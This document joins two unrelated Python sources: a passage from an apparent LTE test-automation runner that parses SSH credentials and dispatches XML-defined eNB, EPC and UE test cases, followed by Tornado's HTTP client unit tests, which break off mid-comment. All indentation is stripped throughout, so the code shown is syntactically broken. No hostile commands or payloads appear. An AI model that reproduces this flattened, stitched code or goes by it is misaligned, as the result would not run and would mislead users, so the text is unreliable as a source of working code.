if action not in ('Build_eNB', 'Initialize_eNB', 'Terminate_eNB', 'Initialize_UE', 'Terminate_UE', 'Attach_UE', 'Detach_UE', 'Ping', 'Iperf', 'Reboot_UE', 'Initialize_HSS', 'Terminate_HSS', 'Initialize_MME', 'Terminate_MME', 'Initialize_SPGW', 'Terminate_SPGW', 'Initialize_CatM_module', 'Terminate_CatM_module', 'Attach_CatM_module', 'Detach_CatM_module', 'Ping_CatM_module', 'IdleSleep'):
logging.debug('ERROR: test-case ' + id + ' has wrong class ' + action)
return False
return True
def GetParametersFromXML(action):
if action == 'Build_eNB':
SSH.Build_eNB_args = test.findtext('Build_eNB_args')
if action == 'Initialize_eNB':
SSH.Initialize_eNB_args = test.findtext('Initialize_eNB_args')
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
if action == 'Terminate_eNB':
SSH.eNB_instance = test.findtext('eNB_instance')
if (SSH.eNB_instance is None):
SSH.eNB_instance = '0'
if action == 'Attach_UE':
nbMaxUEtoAttach = test.findtext('nbMaxUEtoAttach')
if (nbMaxUEtoAttach is None):
SSH.nbMaxUEtoAttach = -1
else:
SSH.nbMaxUEtoAttach = int(nbMaxUEtoAttach)
if action == 'Ping' or action == 'Ping_CatM_module':
SSH.ping_args = test.findtext('ping_args')
SSH.ping_packetloss_threshold = test.findtext('ping_packetloss_threshold')
if action == 'Iperf':
SSH.iperf_args = test.findtext('iperf_args')
SSH.iperf_packetloss_threshold = test.findtext('iperf_packetloss_threshold')
SSH.iperf_profile = test.findtext('iperf_profile')
if (SSH.iperf_profile is None):
SSH.iperf_profile = 'balanced'
else:
if SSH.iperf_profile != 'balanced' and SSH.iperf_profile != 'unbalanced' and SSH.iperf_profile != 'single-ue':
logging.debug('ERROR: test-case has wrong profile ' + SSH.iperf_profile)
SSH.iperf_profile = 'balanced'
if action == 'IdleSleep':
string_field = test.findtext('idle_sleep_time_in_sec')
if (string_field is None):
SSH.idle_sleep_time = 5
else:
SSH.idle_sleep_time = int(string_field)
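# Illustrative <testCase> entry as consumed above (structure inferred from the fields
# read in GetParametersFromXML; the id and the values are invented for the example):
#   <testCase id="030201">
#     <class>Ping</class>
#     <desc>Ping the UE from the EPC</desc>
#     <ping_args>-c 20</ping_args>
#     <ping_packetloss_threshold>25</ping_packetloss_threshold>
#   </testCase>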
#check if given test is in list
#it is in list if one of the strings in 'list' is at the beginning of 'test'
def test_in_list(test, list):
for check in list:
check=check.replace('+','')
if (test.startswith(check)):
return True
return False
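# Example: test_in_list('030201', ['0302+']) is True because '0302' (the entry with its
# trailing '+' stripped) is a prefix of '030201'; test_in_list('030201', ['040000']) is False.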
def receive_signal(signum, frame):
sys.exit(1)
#-----------------------------------------------------------
# Parameter Check
#-----------------------------------------------------------
mode = ''
SSH = SSHConnection()
argvs = sys.argv
argc = len(argvs)
while len(argvs) > 1:
myArgv = argvs.pop(1) # 0th is this file's name
if re.match('^\-\-help$', myArgv, re.IGNORECASE):
Usage()
sys.exit(0)
elif re.match('^\-\-mode=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-mode=(.+)$', myArgv, re.IGNORECASE)
mode = matchReg.group(1)
elif re.match('^\-\-eNBIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBIPAddress = matchReg.group(1)
elif re.match('^\-\-eNBRepository=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBRepository=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBRepository = matchReg.group(1)
elif re.match('^\-\-eNB_AllowMerge=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB_AllowMerge=(.+)$', myArgv, re.IGNORECASE)
doMerge = matchReg.group(1)
if ((doMerge == 'true') or (doMerge == 'True')):
SSH.eNB_AllowMerge = True
elif re.match('^\-\-eNBBranch=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBBranch=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBBranch = matchReg.group(1)
elif re.match('^\-\-eNBCommitID=(.*)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBCommitID=(.*)$', myArgv, re.IGNORECASE)
SSH.eNBCommitID = matchReg.group(1)
elif re.match('^\-\-eNBTargetBranch=(.*)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBTargetBranch=(.*)$', myArgv, re.IGNORECASE)
SSH.eNBTargetBranch = matchReg.group(1)
elif re.match('^\-\-eNBUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBUserName = matchReg.group(1)
elif re.match('^\-\-eNBPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBPassword = matchReg.group(1)
elif re.match('^\-\-eNBSourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBSourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBSourceCodePath = matchReg.group(1)
elif re.match('^\-\-EPCIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCIPAddress = matchReg.group(1)
elif re.match('^\-\-EPCBranch=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCBranch=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCBranch = matchReg.group(1)
elif re.match('^\-\-EPCUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCUserName = matchReg.group(1)
elif re.match('^\-\-EPCPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCPassword = matchReg.group(1)
elif re.match('^\-\-EPCSourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCSourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCSourceCodePath = matchReg.group(1)
elif re.match('^\-\-EPCType=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCType=(.+)$', myArgv, re.IGNORECASE)
if re.match('OAI', matchReg.group(1), re.IGNORECASE) or re.match('ltebox', matchReg.group(1), re.IGNORECASE):
SSH.EPCType = matchReg.group(1)
else:
sys.exit('Invalid EPC Type: ' + matchReg.group(1) + ' -- (should be OAI or ltebox)')
elif re.match('^\-\-ADBIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBIPAddress = matchReg.group(1)
elif re.match('^\-\-ADBUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBUserName = matchReg.group(1)
elif re.match('^\-\-ADBPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBPassword = matchReg.group(1)
elif re.match('^\-\-XMLTestFile=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-XMLTestFile=(.+)$', myArgv, re.IGNORECASE)
SSH.testXMLfiles.append(matchReg.group(1))
SSH.nbTestXMLfiles += 1
elif re.match('^\-\-finalStatus=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-finalStatus=(.+)$', myArgv, re.IGNORECASE)
finalStatus = matchReg.group(1)
if ((finalStatus == 'true') or (finalStatus == 'True')):
SSH.finalStatus = True
else:
Usage()
sys.exit('Invalid Parameter: ' + myArgv)
if re.match('^TerminateeNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateeNB()
elif re.match('^TerminateUE$', mode, re.IGNORECASE):
if SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
signal.signal(signal.SIGUSR1, receive_signal)
SSH.TerminateUE()
elif re.match('^TerminateHSS$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateHSS()
elif re.match('^TerminateMME$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateMME()
elif re.match('^TerminateSPGW$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateSPGW()
elif re.match('^LogCollectBuild$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectBuild()
elif re.match('^LogCollecteNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollecteNB()
elif re.match('^LogCollectHSS$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectHSS()
elif re.match('^LogCollectMME$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectMME()
elif re.match('^LogCollectSPGW$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectSPGW()
elif re.match('^LogCollectPing$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectPing()
elif re.match('^LogCollectIperf$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectIperf()
elif re.match('^InitiateHtml$', mode, re.IGNORECASE):
if SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
count = 0
while (count < SSH.nbTestXMLfiles):
xml_test_file = sys.path[0] + "/" + SSH.testXMLfiles[count]
xmlTree = ET.parse(xml_test_file)
xmlRoot = xmlTree.getroot()
SSH.htmlTabRefs.append(xmlRoot.findtext('htmlTabRef',default='test-tab-' + str(count)))
SSH.htmlTabNames.append(xmlRoot.findtext('htmlTabName',default='Test-' + str(count)))
SSH.htmlTabIcons.append(xmlRoot.findtext('htmlTabIcon',default='info-sign'))
count += 1
SSH.CreateHtmlHeader()
elif re.match('^FinalizeHtml$', mode, re.IGNORECASE):
SSH.CreateHtmlFooter(SSH.finalStatus)
elif re.match('^TesteNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.eNBRepository == '' or SSH.eNBBranch == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '' or SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '' or SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
if (SSH.EPCIPAddress != 'none'):
SSH.copyout(SSH.EPCIPAddress, SSH.EPCUserName, SSH.EPCPassword, sys.path[0] + "/tcp_iperf_stats.awk", "/tmp")
SSH.copyout(SSH.EPCIPAddress, SSH.EPCUserName, SSH.EPCPassword, sys.path[0] + "/active_net_interfaces.awk", "/tmp")
#read test_case_list.xml file
# if no parameters for XML file, use default value
if (SSH.nbTestXMLfiles != 1):
xml_test_file = sys.path[0] + "/test_case_list.xml"
else:
xml_test_file = sys.path[0] + "/" + SSH.testXMLfiles[0]
xmlTree = ET.parse(xml_test_file)
xmlRoot = xmlTree.getroot()
exclusion_tests=xmlRoot.findtext('TestCaseExclusionList',default='')
requested_tests=xmlRoot.findtext('TestCaseRequestedList',default='')
if (SSH.nbTestXMLfiles == 1):
SSH.htmlTabRefs.append(xmlRoot.findtext('htmlTabRef',default='test-tab-0'))
all_tests=xmlRoot.findall('testCase')
exclusion_tests=exclusion_tests.split()
requested_tests=requested_tests.split()
#check that exclusion tests are well formatted
#(6 digits or less than 6 digits followed by +)
for test in exclusion_tests:
if (not re.match('^[0-9]{6}$', test) and
not re.match('^[0-9]{1,5}\+$', test)):
logging.debug('ERROR: exclusion test is invalidly formatted: ' + test)
sys.exit(1)
else:
logging.debug(test)
#check that requested tests are well formatted
#(6 digits or less than 6 digits followed by +)
#be verbose
for test in requested_tests:
if (re.match('^[0-9]{6}$', test) or
re.match('^[0-9]{1,5}\+$', test)):
logging.debug('INFO: test group/case requested: ' + test)
else:
logging.debug('ERROR: requested test is invalidly formatted: ' + test)
sys.exit(1)
#get the list of tests to be done
todo_tests=[]
for test in requested_tests:
if (test_in_list(test, exclusion_tests)):
logging.debug('INFO: test will be skipped: ' + test)
else:
#logging.debug('INFO: test will be run: ' + test)
todo_tests.append(test)
signal.signal(signal.SIGUSR1, receive_signal)
SSH.CreateHtmlTabHeader()
for test_case_id in todo_tests:
for test in all_tests:
id = test.get('id')
if test_case_id != id:
continue
SSH.testCase_id = id
SSH.desc = test.findtext('desc')
action = test.findtext('class')
if (CheckClassValidity(action, id) == False):
continue
SSH.ShowTestID()
GetParametersFromXML(action)
if action in ('Initialize_UE', 'Attach_UE', 'Detach_UE', 'Ping', 'Iperf', 'Reboot_UE'):
terminate_ue_flag = False
SSH.GetAllUEDevices(terminate_ue_flag)
if action == 'Build_eNB':
SSH.BuildeNB()
elif action == 'Initialize_eNB':
SSH.InitializeeNB()
elif action == 'Terminate_eNB':
SSH.TerminateeNB()
elif action == 'Initialize_UE':
SSH.InitializeUE()
elif action == 'Terminate_UE':
SSH.TerminateUE()
elif action == 'Attach_UE':
SSH.AttachUE()
elif action == 'Detach_UE':
SSH.DetachUE()
elif action == 'Initialize_CatM_module':
SSH.InitializeCatM()
elif action == 'Terminate_CatM_module':
SSH.TerminateCatM()
elif action == 'Attach_CatM_module':
SSH.AttachCatM()
elif action == 'Detach_CatM_module':
SSH.TerminateCatM()
elif action == 'Ping_CatM_module':
SSH.PingCatM()
elif action == 'Ping':
SSH.Ping()
elif action == 'Iperf':
SSH.Iperf()
elif action == 'Reboot_UE':
SSH.RebootUE()
elif action == 'Initialize_HSS':
SSH.InitializeHSS()
elif action == 'Terminate_HSS':
SSH.TerminateHSS()
elif action == 'Initialize_MME':
SSH.InitializeMME()
elif action == 'Terminate_MME':
SSH.TerminateMME()
elif action == 'Initialize_SPGW':
SSH.InitializeSPGW()
elif action == 'Terminate_SPGW':
SSH.TerminateSPGW()
elif action == 'IdleSleep':
SSH.IdleSleep()
else:
sys.exit('Invalid action')
SSH.CreateHtmlTabFooter(True)
else:
Usage()
sys.exit('Invalid mode')
sys.exit(0)
|
httpclient_test.py
|
# -*- coding: utf-8 -*-
import base64
import binascii
from contextlib import closing
import copy
import threading
import datetime
from io import BytesIO
import time
import typing # noqa: F401
import unicodedata
import unittest
from tornado.escape import utf8, native_str
from tornado import gen
from tornado.httpclient import (
HTTPRequest,
HTTPResponse,
_RequestProxy,
HTTPError,
HTTPClient,
)
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.iostream import IOStream
from tornado.log import gen_log
from tornado import netutil
from tornado.testing import AsyncHTTPTestCase, bind_unused_port, gen_test, ExpectLog
from tornado.test.util import skipOnTravis
from tornado.web import Application, RequestHandler, url
from tornado.httputil import format_timestamp, HTTPHeaders
class HelloWorldHandler(RequestHandler):
def get(self):
name = self.get_argument("name", "world")
self.set_header("Content-Type", "text/plain")
self.finish("Hello %s!" % name)
class PostHandler(RequestHandler):
def post(self):
self.finish(
"Post arg1: %s, arg2: %s"
% (self.get_argument("arg1"), self.get_argument("arg2"))
)
class PutHandler(RequestHandler):
def put(self):
self.write("Put body: ")
self.write(self.request.body)
class RedirectHandler(RequestHandler):
def prepare(self):
self.write("redirects can have bodies too")
self.redirect(
self.get_argument("url"), status=int(self.get_argument("status", "302"))
)
class ChunkHandler(RequestHandler):
@gen.coroutine
def get(self):
self.write("asdf")
self.flush()
# Wait a bit to ensure the chunks are sent and received separately.
yield gen.sleep(0.01)
self.write("qwer")
class AuthHandler(RequestHandler):
def get(self):
self.finish(self.request.headers["Authorization"])
class CountdownHandler(RequestHandler):
def get(self, count):
count = int(count)
if count > 0:
self.redirect(self.reverse_url("countdown", count - 1))
else:
self.write("Zero")
class EchoPostHandler(RequestHandler):
def post(self):
self.write(self.request.body)
class UserAgentHandler(RequestHandler):
def get(self):
self.write(self.request.headers.get("User-Agent", "User agent not set"))
class ContentLength304Handler(RequestHandler):
def get(self):
self.set_status(304)
self.set_header("Content-Length", 42)
def _clear_headers_for_304(self):
# Tornado strips content-length from 304 responses, but here we
# want to simulate servers that include the headers anyway.
pass
class PatchHandler(RequestHandler):
def patch(self):
"Return the request payload - so we can check it is being kept"
self.write(self.request.body)
class AllMethodsHandler(RequestHandler):
SUPPORTED_METHODS = RequestHandler.SUPPORTED_METHODS + ("OTHER",) # type: ignore
def method(self):
self.write(self.request.method)
get = post = put = delete = options = patch = other = method # type: ignore
class SetHeaderHandler(RequestHandler):
def get(self):
# Use get_arguments for keys to get strings, but
# request.arguments for values to get bytes.
for k, v in zip(self.get_arguments("k"), self.request.arguments["v"]):
self.set_header(k, v)
# These tests end up getting run redundantly: once here with the default
# HTTPClient implementation, and then again in each implementation's own
# test suite.
class HTTPClientCommonTestCase(AsyncHTTPTestCase):
def get_app(self):
return Application(
[
url("/hello", HelloWorldHandler),
url("/post", PostHandler),
url("/put", PutHandler),
url("/redirect", RedirectHandler),
url("/chunk", ChunkHandler),
url("/auth", AuthHandler),
url("/countdown/([0-9]+)", CountdownHandler, name="countdown"),
url("/echopost", EchoPostHandler),
url("/user_agent", UserAgentHandler),
url("/304_with_content_length", ContentLength304Handler),
url("/all_methods", AllMethodsHandler),
url("/patch", PatchHandler),
url("/set_header", SetHeaderHandler),
],
gzip=True,
)
def test_patch_receives_payload(self):
body = b"some patch data"
response = self.fetch("/patch", method="PATCH", body=body)
self.assertEqual(response.code, 200)
self.assertEqual(response.body, body)
@skipOnTravis
def test_hello_world(self):
response = self.fetch("/hello")
self.assertEqual(response.code, 200)
self.assertEqual(response.headers["Content-Type"], "text/plain")
self.assertEqual(response.body, b"Hello world!")
self.assertEqual(int(response.request_time), 0)
response = self.fetch("/hello?name=Ben")
self.assertEqual(response.body, b"Hello Ben!")
def test_streaming_callback(self):
# streaming_callback is also tested in test_chunked
chunks = [] # type: typing.List[bytes]
response = self.fetch("/hello", streaming_callback=chunks.append)
# with streaming_callback, data goes to the callback and not response.body
self.assertEqual(chunks, [b"Hello world!"])
self.assertFalse(response.body)
def test_post(self):
response = self.fetch("/post", method="POST", body="arg1=foo&arg2=bar")
self.assertEqual(response.code, 200)
self.assertEqual(response.body, b"Post arg1: foo, arg2: bar")
def test_chunked(self):
response = self.fetch("/chunk")
self.assertEqual(response.body, b"asdfqwer")
chunks = [] # type: typing.List[bytes]
response = self.fetch("/chunk", streaming_callback=chunks.append)
self.assertEqual(chunks, [b"asdf", b"qwer"])
self.assertFalse(response.body)
def test_chunked_close(self):
# test case in which chunks spread read-callback processing
# over several ioloop iterations, but the connection is already closed.
sock, port = bind_unused_port()
with closing(sock):
@gen.coroutine
def accept_callback(conn, address):
# fake an HTTP server using chunked encoding where the final chunks
# and connection close all happen at once
stream = IOStream(conn)
request_data = yield stream.read_until(b"\r\n\r\n")
if b"HTTP/1." not in request_data:
self.skipTest("requires HTTP/1.x")
yield stream.write(
b"""\
HTTP/1.1 200 OK
Transfer-Encoding: chunked

1
1
1
2
0

""".replace(
b"\n", b"\r\n"
)
)
stream.close()
netutil.add_accept_handler(sock, accept_callback) # type: ignore
resp = self.fetch("http://127.0.0.1:%d/" % port)
resp.rethrow()
self.assertEqual(resp.body, b"12")
self.io_loop.remove_handler(sock.fileno())
def test_basic_auth(self):
# This test data appears in section 2 of RFC 7617.
self.assertEqual(
self.fetch(
"/auth", auth_username="Aladdin", auth_password="open sesame"
).body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==",
)
def test_basic_auth_explicit_mode(self):
self.assertEqual(
self.fetch(
"/auth",
auth_username="Aladdin",
auth_password="open sesame",
auth_mode="basic",
).body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==",
)
def test_basic_auth_unicode(self):
# This test data appears in section 2.1 of RFC 7617.
self.assertEqual(
self.fetch("/auth", auth_username="test", auth_password="123£").body,
b"Basic dGVzdDoxMjPCow==",
)
# The standard mandates NFC. Give it a decomposed username
# and ensure it is normalized to composed form.
username = unicodedata.normalize("NFD", u"josé")
self.assertEqual(
self.fetch("/auth", auth_username=username, auth_password="səcrət").body,
b"Basic am9zw6k6c8mZY3LJmXQ=",
)
def test_unsupported_auth_mode(self):
# curl and simple clients handle errors a bit differently; the
# important thing is that they don't fall back to basic auth
# on an unknown mode.
with ExpectLog(gen_log, "uncaught exception", required=False):
with self.assertRaises((ValueError, HTTPError)):
self.fetch(
"/auth",
auth_username="Aladdin",
auth_password="open sesame",
auth_mode="asdf",
raise_error=True,
)
def test_follow_redirect(self):
response = self.fetch("/countdown/2", follow_redirects=False)
self.assertEqual(302, response.code)
self.assertTrue(response.headers["Location"].endswith("/countdown/1"))
response = self.fetch("/countdown/2")
self.assertEqual(200, response.code)
self.assertTrue(response.effective_url.endswith("/countdown/0"))
self.assertEqual(b"Zero", response.body)
def test_credentials_in_url(self):
url = self.get_url("/auth").replace("http://", "http://me:secret@")
response = self.fetch(url)
self.assertEqual(b"Basic " + base64.b64encode(b"me:secret"), response.body)
def test_body_encoding(self):
unicode_body = u"\xe9"
byte_body = binascii.a2b_hex(b"e9")
# unicode string in body gets converted to utf8
response = self.fetch(
"/echopost",
method="POST",
body=unicode_body,
headers={"Content-Type": "application/blah"},
)
self.assertEqual(response.headers["Content-Length"], "2")
self.assertEqual(response.body, utf8(unicode_body))
# byte strings pass through directly
response = self.fetch(
"/echopost",
method="POST",
body=byte_body,
headers={"Content-Type": "application/blah"},
)
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
# Mixing unicode in headers and byte string bodies shouldn't
# break anything
response = self.fetch(
"/echopost",
method="POST",
body=byte_body,
headers={"Content-Type": "application/blah"},
user_agent=u"foo",
)
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
def test_types(self):
response = self.fetch("/hello")
self.assertEqual(type(response.body), bytes)
self.assertEqual(type(response.headers["Content-Type"]), str)
self.assertEqual(type(response.code), int)
self.assertEqual(type(response.effective_url), str)
def test_header_callback(self):
first_line = []
headers = {}
chunks = []
def header_callback(header_line):
if header_line.startswith("HTTP/1.1 101"):
# Upgrading to HTTP/2
pass
elif header_line.startswith("HTTP/"):
first_line.append(header_line)
elif header_line != "\r\n":
k, v = header_line.split(":", 1)
headers[k.lower()] = v.strip()
def streaming_callback(chunk):
# All header callbacks are run before any streaming callbacks,
# so the header data is available to process the data as it
# comes in.
self.assertEqual(headers["content-type"], "text/html; charset=UTF-8")
chunks.append(chunk)
self.fetch(
"/chunk",
header_callback=header_callback,
streaming_callback=streaming_callback,
)
self.assertEqual(len(first_line), 1, first_line)
self.assertRegexpMatches(first_line[0], "HTTP/[0-9]\\.[0-9] 200.*\r\n")
self.assertEqual(chunks, [b"asdf", b"qwer"])
@gen_test
def test_configure_defaults(self):
defaults = dict(user_agent="TestDefaultUserAgent", allow_ipv6=False)
# Construct a new instance of the configured client class
client = self.http_client.__class__(force_instance=True, defaults=defaults)
try:
response = yield client.fetch(self.get_url("/user_agent"))
self.assertEqual(response.body, b"TestDefaultUserAgent")
finally:
client.close()
def test_header_types(self):
# Header values may be passed as character or utf8 byte strings,
# in a plain dictionary or an HTTPHeaders object.
# Keys must always be the native str type.
# All combinations should have the same results on the wire.
for value in [u"MyUserAgent", b"MyUserAgent"]:
for container in [dict, HTTPHeaders]:
headers = container()
headers["User-Agent"] = value
resp = self.fetch("/user_agent", headers=headers)
self.assertEqual(
resp.body,
b"MyUserAgent",
"response=%r, value=%r, container=%r"
% (resp.body, value, container),
)
def test_multi_line_headers(self):
# Multi-line http headers are rare but rfc-allowed
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec4.html#sec4.2
sock, port = bind_unused_port()
with closing(sock):
@gen.coroutine
def accept_callback(conn, address):
stream = IOStream(conn)
request_data = yield stream.read_until(b"\r\n\r\n")
if b"HTTP/1." not in request_data:
self.skipTest("requires HTTP/1.x")
yield stream.write(
b"""\
HTTP/1.1 200 OK
X-XSS-Protection: 1;
\tmode=block

""".replace(
b"\n", b"\r\n"
)
)
stream.close()
netutil.add_accept_handler(sock, accept_callback) # type: ignore
resp = self.fetch("http://127.0.0.1:%d/" % port)
resp.rethrow()
self.assertEqual(resp.headers["X-XSS-Protection"], "1; mode=block")
self.io_loop.remove_handler(sock.fileno())
def test_304_with_content_length(self):
# According to the spec 304 responses SHOULD NOT include
# Content-Length or other entity headers, but some servers do it
# anyway.
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3.5
response = self.fetch("/304_with_content_length")
self.assertEqual(response.code, 304)
self.assertEqual(response.headers["Content-Length"], "42")
@gen_test
def test_future_interface(self):
response = yield self.http_client.fetch(self.get_url("/hello"))
self.assertEqual(response.body, b"Hello world!")
@gen_test
def test_future_http_error(self):
with self.assertRaises(HTTPError) as context:
yield self.http_client.fetch(self.get_url("/notfound"))
self.assertEqual(context.exception.code, 404)
self.assertEqual(context.exception.response.code, 404)
@gen_test
def test_future_http_error_no_raise(self):
response = yield self.http_client.fetch(
self.get_url("/notfound"), raise_error=False
)
self.assertEqual(response.code, 404)
@gen_test
def test_reuse_request_from_response(self):
# The response.request attribute should be an HTTPRequest, not
# a _RequestProxy.
# This test uses self.http_client.fetch because self.fetch calls
# self.get_url on the input unconditionally.
url = self.get_url("/hello")
response = yield self.http_client.fetch(url)
self.assertEqual(response.request.url, url)
self.assertTrue(isinstance(response.request, HTTPRequest))
response2 = yield self.http_client.fetch(response.request)
self.assertEqual(response2.body, b"Hello world!")
def test_all_methods(self):
for method in ["GET", "DELETE", "OPTIONS"]:
response = self.fetch("/all_methods", method=method)
self.assertEqual(response.body, utf8(method))
for method in ["POST", "PUT", "PATCH"]:
response = self.fetch("/all_methods", method=method, body=b"")
self.assertEqual(response.body, utf8(method))
response = self.fetch("/all_methods", method="HEAD")
self.assertEqual(response.body, b"")
response = self.fetch(
"/all_methods", method="OTHER", allow_nonstandard_methods=True
)
self.assertEqual(response.body, b"OTHER")
def test_body_sanity_checks(self):
# These methods require a body.
for method in ("POST", "PUT", "PATCH"):
with self.assertRaises(ValueError) as context:
self.fetch("/all_methods", method=method, raise_error=True)
self.assertIn("must not be None", str(context.exception))
resp = self.fetch(
"/all_methods", method=method, allow_nonstandard_methods=True
)
self.assertEqual(resp.code, 200)
# These methods don't allow a body.
for method in ("GET", "DELETE", "OPTIONS"):
with self.assertRaises(ValueError) as context:
self.fetch(
"/all_methods", method=method, body=b"asdf", raise_error=True
)
self.assertIn("must be None", str(context.exception))
# In most cases this can be overridden, but curl_httpclient
# does not allow body with a GET at all.
if method != "GET":
self.fetch(
"/all_methods",
method=method,
body=b"asdf",
allow_nonstandard_methods=True,
raise_error=True,
)
self.assertEqual(resp.code, 200)
# This test causes odd failures with the combination of
# curl_httpclient (at least with the version of libcurl available
# on ubuntu 12.04), TwistedIOLoop, and epoll. For POST (but not PUT),
# curl decides the response came back too soon and closes the connection
# to start again. It does this *before* telling the socket callback to
# unregister the FD. Some IOLoop implementations have special kernel
# integration to discover this immediately. Tornado's IOLoops
# ignore errors on remove_handler to accommodate this behavior, but
# Twisted's reactor does not. The removeReader call fails and so
# do all future removeAll calls (which our tests do at cleanup).
#
# def test_post_307(self):
# response = self.fetch("/redirect?status=307&url=/post",
# method="POST", body=b"arg1=foo&arg2=bar")
# self.assertEqual(response.body, b"Post arg1: foo, arg2: bar")
def test_put_307(self):
response = self.fetch(
"/redirect?status=307&url=/put", method="PUT", body=b"hello"
)
response.rethrow()
self.assertEqual(response.body, b"Put body: hello")
def test_non_ascii_header(self):
# Non-ascii headers are sent as latin1.
response = self.fetch("/set_header?k=foo&v=%E9")
response.rethrow()
self.assertEqual(response.headers["Foo"], native_str(u"\u00e9"))
def test_response_times(self):
# A few simple sanity checks of the response time fields to
# make sure they're using the right basis (between the
